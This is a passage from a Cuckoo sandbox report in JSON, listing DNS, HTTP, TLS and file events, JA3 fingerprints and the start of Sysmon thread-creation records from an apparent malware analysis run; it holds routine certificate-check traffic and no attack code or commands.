"proto":"UDP",
"pcap_cnt":624,
"timestamp":"2020-12-09T15:53:58.273930+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"PTR",
"rrname":"14.174.34.23.in-addr.arpa",
"answers":[
{
"rrtype":"PTR",
"rrname":"14.174.34.23.in-addr.arpa",
"rdata":"a23-34-174-14.deploy.static.akamaitechnologies.com",
"ttl":21599
}
],
"rd":true,
"grouped":{
"PTR":[
"a23-34-174-14.deploy.static.akamaitechnologies.com"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":23864
},
"flow_id":679837035855558,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":65435,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":709,
"timestamp":"2020-12-09T15:54:14.196395+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"14.128.139.151.in-addr.arpa",
"type":"query",
"id":43092
},
"flow_id":1254288912744235,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"tls":{
"notbefore":"2020-10-27T00:00:00",
"issuerdn":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA 2",
"ja3":{
},
"sni":"cdn.discordapp.com",
"version":"TLSv1",
"fingerprint":"f6:9d:91:4d:42:41:01:89:e8:49:e7:bb:98:46:48:e3:f4:7a:5a:bd",
"serial":"00:86:00:94:F5:04:0E:E8:CF:77:E7:81:D7:B9:C7:B8:6A",
"notafter":"2021-05-05T23:59:59",
"ja3s":{
},
"subject":"CN=ssl711319.cloudflaressl.com"
},
"src_port":49179,
"event_type":"tls",
"proto":"TCP",
"pcap_cnt":465,
"timestamp":"2020-12-09T15:53:46.145699+0100",
"src_ip":"192.168.56.104",
"flow_id":919440375550945,
"dest_port":443,
"dest_ip":"162.159.130.233"
},
{
"src_port":55406,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":608,
"timestamp":"2020-12-09T15:53:57.169070+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"www.microsoft.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"www.microsoft.com",
"rdata":"www.microsoft.com-c-3.edgekey.net",
"ttl":2598
},
{
"rrtype":"CNAME",
"rrname":"www.microsoft.com-c-3.edgekey.net",
"rdata":"www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net",
"ttl":21475
},
{
"rrtype":"CNAME",
"rrname":"www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net",
"rdata":"e13678.dspb.akamaiedge.net",
"ttl":346
},
{
"rrtype":"A",
"rrname":"e13678.dspb.akamaiedge.net",
"rdata":"23.34.174.14",
"ttl":19
}
],
"rd":true,
"grouped":{
"A":[
"23.34.174.14"
],
"CNAME":[
"www.microsoft.com-c-3.edgekey.net",
"www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net",
"e13678.dspb.akamaiedge.net"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":58270
},
"flow_id":82866646392027,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":54955,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":248,
"timestamp":"2020-12-09T15:53:35.206686+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"65.139.20.104.in-addr.arpa",
"type":"query",
"id":12830
},
"flow_id":195970313693022,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":52517,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":786,
"timestamp":"2020-12-09T15:54:29.300832+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"nexus.officeapps.live.com",
"type":"query",
"id":36317
},
"flow_id":799434697185056,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49191,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":649,
"timestamp":"2020-12-09T15:54:03.019941+0100",
"src_ip":"192.168.56.104",
"tx_id":0,
"flow_id":1012331929281841,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"hostname":"www.microsoft.com",
"length":1521,
"http_method":"GET",
"http_content_type":"application/octet-stream"
},
"dest_port":80,
"dest_ip":"23.34.174.14"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":649,
"timestamp":"2020-12-09T15:54:03.019941+0100",
"app_proto":"http",
"src_ip":"23.34.174.14",
"flow_id":1012331929281841,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"hostname":"www.microsoft.com",
"length":1521,
"http_method":"GET",
"http_content_type":"application/octet-stream"
},
"fileinfo":{
"filename":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"tx_id":0,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":1521
},
"dest_port":49191,
"dest_ip":"192.168.56.104"
},
{
"src_port":62535,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":589,
"timestamp":"2020-12-09T15:53:52.200602+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"50.22.28.184.in-addr.arpa",
"type":"query",
"id":25618
},
"flow_id":2148969253703578,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":57718,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":828,
"timestamp":"2020-12-09T15:54:43.203022+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"250.255.255.239.in-addr.arpa",
"type":"query",
"id":61228
},
"flow_id":1925433389160718,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":52517,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":787,
"timestamp":"2020-12-09T15:54:29.352229+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"nexus.officeapps.live.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"nexus.officeapps.live.com",
"rdata":"prod-w.nexus.live.com.akadns.net",
"ttl":50
},
{
"rrtype":"A",
"rrname":"prod-w.nexus.live.com.akadns.net",
"rdata":"52.109.12.21",
"ttl":291
}
],
"rd":true,
"grouped":{
"A":[
"52.109.12.21"
],
"CNAME":[
"prod-w.nexus.live.com.akadns.net"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":36317
},
"flow_id":799434697185056,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":54955,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":265,
"timestamp":"2020-12-09T15:53:35.276969+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"65.139.20.104.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"20.104.in-addr.arpa",
"ttl":1799
}
],
"type":"answer",
"id":12830
},
"flow_id":195970313693022,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49177,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":444,
"timestamp":"2020-12-09T15:53:45.677668+0100",
"src_ip":"192.168.56.104",
"tx_id":1,
"flow_id":1468968555835339,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D",
"hostname":"ocsp.digicert.com",
"length":471,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"dest_port":80,
"dest_ip":"93.184.220.29"
},
{
"src_port":49193,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":702,
"timestamp":"2020-12-09T15:54:13.648617+0100",
"src_ip":"192.168.56.104",
"tx_id":0,
"flow_id":1294472626669699,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D",
"hostname":"ocsp.comodoca.com",
"length":471,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"dest_port":80,
"dest_ip":"151.139.128.14"
},
{
"src_port":65435,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":710,
"timestamp":"2020-12-09T15:54:14.239101+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"14.128.139.151.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"139.151.in-addr.arpa",
"ttl":1708
}
],
"type":"answer",
"id":43092
},
"flow_id":1254288912744235,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":444,
"timestamp":"2020-12-09T15:53:45.677668+0100",
"app_proto":"http",
"src_ip":"93.184.220.29",
"flow_id":1468968555835339,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D",
"hostname":"ocsp.digicert.com",
"length":471,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"fileinfo":{
"filename":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka/LJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx/7bSyRc4Qqo=",
"tx_id":1,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":471
},
"dest_port":49177,
"dest_ip":"192.168.56.104"
},
{
"tls":{
"notbefore":"2020-10-02T21:28:21",
"issuerdn":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01",
"ja3":{
},
"sni":"nexus.officeapps.live.com",
"version":"TLSv1",
"fingerprint":"7b:00:e2:a3:8c:b3:2b:b9:f6:df:cc:37:7a:ed:6b:48:e9:0b:c1:3b",
"serial":"6B:00:00:56:75:21:F4:B7:C1:DE:1C:28:F6:00:00:00:00:56:75",
"notafter":"2021-10-02T21:28:21",
"ja3s":{
},
"subject":"CN=nexus.officeapps.live.com"
},
"src_port":49206,
"event_type":"tls",
"proto":"TCP",
"pcap_cnt":796,
"timestamp":"2020-12-09T15:54:29.632053+0100",
"src_ip":"192.168.56.104",
"flow_id":1477618623146587,
"dest_port":443,
"dest_ip":"52.109.12.21"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":702,
"timestamp":"2020-12-09T15:54:13.648617+0100",
"app_proto":"http",
"src_ip":"151.139.128.14",
"flow_id":1294472626669699,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D",
"hostname":"ocsp.comodoca.com",
"length":471,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"fileinfo":{
"filename":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT/WUBgbSwIQ=",
"tx_id":0,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":471
},
"dest_port":49193,
"dest_ip":"192.168.56.104"
},
{
"src_port":56053,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":776,
"timestamp":"2020-12-09T15:54:26.213468+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"crl.comodoca4.com",
"type":"query",
"id":48702
},
"flow_id":494663817642460,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":57718,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":829,
"timestamp":"2020-12-09T15:54:43.255100+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"250.255.255.239.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"239.in-addr.arpa",
"ttl":1583
}
],
"type":"answer",
"id":61228
},
"flow_id":1925433389160718,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":62535,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":592,
"timestamp":"2020-12-09T15:53:52.307933+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"PTR",
"rrname":"50.22.28.184.in-addr.arpa",
"answers":[
{
"rrtype":"PTR",
"rrname":"50.22.28.184.in-addr.arpa",
"rdata":"a184-28-22-50.deploy.static.akamaitechnologies.com",
"ttl":21599
}
],
"rd":true,
"grouped":{
"PTR":[
"a184-28-22-50.deploy.static.akamaitechnologies.com"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":25618
},
"flow_id":2148969253703578,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49202,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":740,
"timestamp":"2020-12-09T15:54:18.926262+0100",
"src_ip":"192.168.56.104",
"tx_id":0,
"flow_id":1601807601813520,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
"hostname":"ocsp.comodoca4.com",
"length":727,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"dest_port":80,
"dest_ip":"151.139.128.14"
},
{
"src_port":56053,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":777,
"timestamp":"2020-12-09T15:54:26.266084+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"crl.comodoca4.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"crl.comodoca4.com",
"rdata":"w3z5q8a6.stackpathcdn.com",
"ttl":682
},
{
"rrtype":"A",
"rrname":"w3z5q8a6.stackpathcdn.com",
"rdata":"151.139.128.14",
"ttl":3362
}
],
"rd":true,
"grouped":{
"A":[
"151.139.128.14"
],
"CNAME":[
"w3z5q8a6.stackpathcdn.com"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":48702
},
"flow_id":494663817642460,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":740,
"timestamp":"2020-12-09T15:54:18.926262+0100",
"app_proto":"http",
"src_ip":"151.139.128.14",
"flow_id":1601807601813520,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
"hostname":"ocsp.comodoca4.com",
"length":727,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"fileinfo":{
"filename":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69+Aj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE=",
"tx_id":0,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":727
},
"dest_port":49202,
"dest_ip":"192.168.56.104"
},
{
"src_port":54857,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":693,
"timestamp":"2020-12-09T15:54:13.515413+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"ocsp.comodoca.com",
"type":"query",
"id":26831
},
"flow_id":596372937366869,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"tls":{
"notbefore":"2020-10-02T21:28:21",
"issuerdn":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01",
"ja3":{
},
"sni":"nexus.officeapps.live.com",
"version":"TLSv1",
"fingerprint":"7b:00:e2:a3:8c:b3:2b:b9:f6:df:cc:37:7a:ed:6b:48:e9:0b:c1:3b",
"serial":"6B:00:00:56:75:21:F4:B7:C1:DE:1C:28:F6:00:00:00:00:56:75",
"notafter":"2021-10-02T21:28:21",
"ja3s":{
},
"subject":"CN=nexus.officeapps.live.com"
},
"src_port":49219,
"event_type":"tls",
"proto":"TCP",
"pcap_cnt":814,
"timestamp":"2020-12-09T15:54:41.726024+0100",
"src_ip":"192.168.56.104",
"flow_id":797244264674679,
"dest_port":443,
"dest_ip":"52.109.12.21"
},
{
"src_port":54857,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":694,
"timestamp":"2020-12-09T15:54:13.558083+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"ocsp.comodoca.com",
"answers":[
{
"rrtype":"A",
"rrname":"ocsp.comodoca.com",
"rdata":"151.139.128.14",
"ttl":551
}
],
"rd":true,
"grouped":{
"A":[
"151.139.128.14"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":26831
},
"flow_id":596372937366869,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":516,
"timestamp":"2020-12-09T15:53:51.751757+0100",
"app_proto":"http",
"src_ip":"184.28.22.50",
"flow_id":1697198823643150,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"hostname":"www.download.windowsupdate.com",
"length":6295,
"http_method":"GET",
"http_content_type":"application/vnd.ms-cab-compressed"
},
"fileinfo":{
"filename":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"tx_id":0,
"state":"TRUNCATED",
"stored":false,
"gaps":false,
"sid":[
],
"size":4079
},
"dest_port":49180,
"dest_ip":"192.168.56.104"
},
{
"src_port":49190,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":616,
"timestamp":"2020-12-09T15:53:57.524636+0100",
"src_ip":"192.168.56.104",
"tx_id":0,
"flow_id":2174833547125481,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"hostname":"www.microsoft.com",
"length":1521,
"http_method":"GET",
"http_content_type":"application/octet-stream"
},
"dest_port":80,
"dest_ip":"23.34.174.14"
},
{
"src_port":49203,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":785,
"timestamp":"2020-12-09T15:54:26.355928+0100",
"src_ip":"192.168.56.104",
"tx_id":0,
"flow_id":1623445647529959,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/COMODORSADomainValidationSecureServerCA2.crl",
"hostname":"crl.comodoca4.com",
"length":568,
"http_method":"GET",
"http_content_type":"application/pkix-crl"
},
"dest_port":80,
"dest_ip":"151.139.128.14"
},
{
"src_port":52818,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":731,
"timestamp":"2020-12-09T15:54:18.793713+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"ocsp.comodoca4.com",
"type":"query",
"id":52939
},
"flow_id":1703460887731313,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":616,
"timestamp":"2020-12-09T15:53:57.524636+0100",
"app_proto":"http",
"src_ip":"23.34.174.14",
"flow_id":2174833547125481,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"hostname":"www.microsoft.com",
"length":1521,
"http_method":"GET",
"http_content_type":"application/octet-stream"
},
"fileinfo":{
"filename":"/pki/certs/MicRooCerAut_2010-06-23.crt",
"tx_id":0,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":1521
},
"dest_port":49190,
"dest_ip":"192.168.56.104"
},
{
"src_port":49202,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":770,
"timestamp":"2020-12-09T15:54:24.302639+0100",
"src_ip":"192.168.56.104",
"tx_id":1,
"flow_id":1601807601813520,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
"hostname":"ocsp.comodoca4.com",
"length":472,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"dest_port":80,
"dest_ip":"151.139.128.14"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":770,
"timestamp":"2020-12-09T15:54:24.302639+0100",
"app_proto":"http",
"src_ip":"151.139.128.14",
"flow_id":1601807601813520,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
"hostname":"ocsp.comodoca4.com",
"length":472,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"fileinfo":{
"filename":"/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1+o83zCN+Y2wTgIAQU1LD0/U+cQqRs3D0u7ltBGMmtA/YCEQCGAJT1BA7oz3fngde5x7hq",
"tx_id":1,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":472
},
"dest_port":49202,
"dest_ip":"192.168.56.104"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":785,
"timestamp":"2020-12-09T15:54:26.355928+0100",
"app_proto":"http",
"src_ip":"151.139.128.14",
"flow_id":1623445647529959,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/COMODORSADomainValidationSecureServerCA2.crl",
"hostname":"crl.comodoca4.com",
"length":568,
"http_method":"GET",
"http_content_type":"application/pkix-crl"
},
"fileinfo":{
"filename":"/COMODORSADomainValidationSecureServerCA2.crl",
"tx_id":0,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":568
},
"dest_port":49203,
"dest_ip":"192.168.56.104"
},
{
"src_port":52818,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":732,
"timestamp":"2020-12-09T15:54:18.836594+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"ocsp.comodoca4.com",
"answers":[
{
"rrtype":"A",
"rrname":"ocsp.comodoca4.com",
"rdata":"151.139.128.14",
"ttl":498
}
],
"rd":true,
"grouped":{
"A":[
"151.139.128.14"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":52939
},
"flow_id":1703460887731313,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49180,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":583,
"timestamp":"2020-12-09T15:53:51.926961+0100",
"metadata":{
"flowbits":[
"ET.INFO.WindowsUpdate"
]
},
"src_ip":"192.168.56.104",
"tx_id":0,
"flow_id":1697198823643150,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"hostname":"www.download.windowsupdate.com",
"length":58936,
"http_method":"GET",
"http_content_type":"application/vnd.ms-cab-compressed"
},
"dest_port":80,
"dest_ip":"184.28.22.50"
},
{
"src_port":49180,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":676,
"timestamp":"2020-12-09T15:54:08.537040+0100",
"metadata":{
"flowbits":[
"ET.INFO.WindowsUpdate"
]
},
"src_ip":"192.168.56.104",
"tx_id":1,
"flow_id":1697198823643150,
"http":{
"status":304,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"hostname":"www.download.windowsupdate.com",
"length":0,
"http_method":"GET",
"http_content_type":"application/vnd.ms-cab-compressed"
},
"dest_port":80,
"dest_ip":"184.28.22.50"
}
]
},
"hostname":"cuckoo10",
"JA3":{
"client":[
{
"destination_ip":"52.109.76.68",
"source_ip":"192.168.56.104",
"ja3":"769,47-53-5-10-49171-49172-49161-49162-50-56-19-4,,,",
"source_port":49174,
"destination_port":443,
"ja3_digest":"53adf8827a83d37784c046c24c7bb383"
},
{
"destination_ip":"104.20.139.65",
"source_ip":"192.168.56.104",
"ja3":"769,47-53-5-10-49171-49172-49161-49162-50-56-19-4,,,",
"source_port":49175,
"destination_port":443,
"ja3_digest":"53adf8827a83d37784c046c24c7bb383"
},
{
"destination_ip":"52.109.12.21",
"source_ip":"192.168.56.104",
"ja3":"769,47-53-5-10-49171-49172-49161-49162-50-56-19-4,,,",
"source_port":49176,
"destination_port":443,
"ja3_digest":"53adf8827a83d37784c046c24c7bb383"
},
{
"destination_ip":"52.109.76.32",
"source_ip":"192.168.56.104",
"ja3":"769,47-53-5-10-49171-49172-49161-49162-50-56-19-4,,,",
"source_port":49178,
"destination_port":443,
"ja3_digest":"53adf8827a83d37784c046c24c7bb383"
},
{
"destination_ip":"162.159.130.233",
"source_ip":"192.168.56.104",
"ja3":"769,47-53-5-10-49171-49172-49161-49162-50-56-19-4,,,",
"source_port":49179,
"destination_port":443,
"ja3_digest":"53adf8827a83d37784c046c24c7bb383"
},
{
"destination_ip":"52.109.12.21",
"source_ip":"192.168.56.104",
"ja3":"769,47-53-5-10-49171-49172-49161-49162-50-56-19-4,,,",
"source_port":49206,
"destination_port":443,
"ja3_digest":"53adf8827a83d37784c046c24c7bb383"
},
{
"destination_ip":"52.109.12.21",
"source_ip":"192.168.56.104",
"ja3":"769,47-53-5-10-49171-49172-49161-49162-50-56-19-4,,,",
"source_port":49219,
"destination_port":443,
"ja3_digest":"53adf8827a83d37784c046c24c7bb383"
}
],
"server":[
{
"destination_ip":"192.168.56.104",
"source_ip":"104.20.139.65",
"ja3":"769,49171,",
"source_port":443,
"destination_port":49175,
"ja3_digest":"79ad2484c667423b4760722b91ebe7a9"
},
{
"destination_ip":"192.168.56.104",
"source_ip":"162.159.130.233",
"ja3":"769,49171,",
"source_port":443,
"destination_port":49179,
"ja3_digest":"79ad2484c667423b4760722b91ebe7a9"
}
]
},
"att&ck":[
],
"sha256":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"cuckoo_time":1607525708,
"event_logs":{
"eventlog":[
],
"code_integrity":[
],
"firewall":[
],
"sysmon":[
{
"eventid":"8",
"task":"8",
"computer":"XxfUNrINQT",
"NewThreadId":"2972",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"SourceProcessId":"2956",
"StartAddress":"0x0000000000AF0000",
"TargetImage":"C:\\Windows\\System32\\lsass.exe",
"UtcTime":"2020-12-09 14:53:20.437",
"version":"2",
"opcode":"0",
"eventrecordid":"1077",
"TargetProcessId":"468",
"SourceProcessGuid":"{532A224E-E4E0-5FD0-0000-0010AA4E0400}",
"TargetProcessGuid":"{532A224E-5858-5C76-0000-00101B570000}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"SourceImage":"C:\\tmp7vkpxh\\bin\\inject-x64.exe"
},
{
"eventid":"8",
"task":"8",
"computer":"XxfUNrINQT",
"NewThreadId":"2976",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"SourceProcessId":"2956",
"StartAddress":"0x0000000000AF0000",
"TargetImage":"C:\\Windows\\System32\\lsass.exe",
"UtcTime":"2020-12-09 14:53:20.437",
"version":"2",
"opcode":"0",
"eventrecordid":"1078",
"TargetProcessId":"468",
"SourceProcessGuid":"{532A224E-E4E0-5FD0-0000-0010AA4E0400}",
